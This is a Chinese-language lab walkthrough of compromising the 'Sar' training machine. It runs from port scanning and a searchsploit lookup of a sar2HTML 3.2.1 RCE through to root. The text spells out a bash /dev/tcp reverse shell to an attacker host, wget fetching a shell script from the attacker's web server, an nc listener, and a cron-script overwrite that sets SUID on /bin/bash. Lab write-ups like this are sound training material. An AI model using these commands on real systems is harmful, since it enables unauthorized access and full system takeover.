0x01 前言

好久没有更新了，最近公司来项目了也就没进行更新。今天闲下来就继续更新文章了。今天的靶机是Sar机器，难度不大。废话不多说，直接开搞。

0x02 过程

信息收集

先用masscan+nmap来一波端口信息收集

masscan -p 0-65535  192.168.190.35 --rate=10000 -e tun0 

扫描到开放端口22和80端口

用nmap对端口信息进行详细收集

nmap -sV -sS -p 22,80 192.168.190.35

访问web站点发现robots.txt文件，里面还记录了一个隐藏目录

进入sar2HTML目录，得到了后台版本信息

用searchsploit搜索历史漏洞

searchsploit sar2html 3.2.1

发现存在RCE漏洞

获取利用脚本，进行利用

Getshell

得到exp文件，进行利用，成功执行系统命令

在获取反弹shell的时候

bash -c 'bash -i >& /dev/tcp/kali-ip/port 0>&1'

反弹不了shell，用echo写入文件也不行，然后想到让目标主机下载反弹shell脚本文件

先确定目录，以及是否能用wget

确定了能使用wget，然后对kali上的脚本文件进行下载

shell脚本

用python3在当前目录下开启一个简易http服务

python3 -m http.server 80

临时shell上执行(默认访问80端口使用http服务，如果是其它端口记得加上http://以及端口号)

wget 192.168.45.178/shell.php

成功接收到请求

用nc监听4444端口，接收反弹回来的shell

成功拿到shell

提权

调用python的shell，防止有一些命令不能用

python3 -c 'import pty;pty.spawn("/bin/bash")'

在home下存在一个love用户的家目录

但是里面没有能利用的文件

通过查找suid、sudo list都没有提权点。

当时想的是应该需要切换到love用户，再提权到root，就去找登录凭证。想到web站点应该有数据库配置文件。

在切换到/var/www/html目录时发现有两个可能存在提权的文件

文件内容为

finally.sh

write.sh

看起来像是计划任务，查询计划任务列表

cat /etc/crontab

确实存在该计划任务，并且每5分钟执行一次

这下我们就可以修改write.sh文件来进行提权

echo "bash -c 'chmod u+s /bin/bash'" > write.sh

成功修改文件

现在就等计划任务执行，将bash带上suid权限

利用bash提权

0x03 总结

这个靶机整体难度不大，但是在提权的时候也让我意识到，一定要先把suid、sudo list和计划任务这三个点看了，这样可以节省很多时间。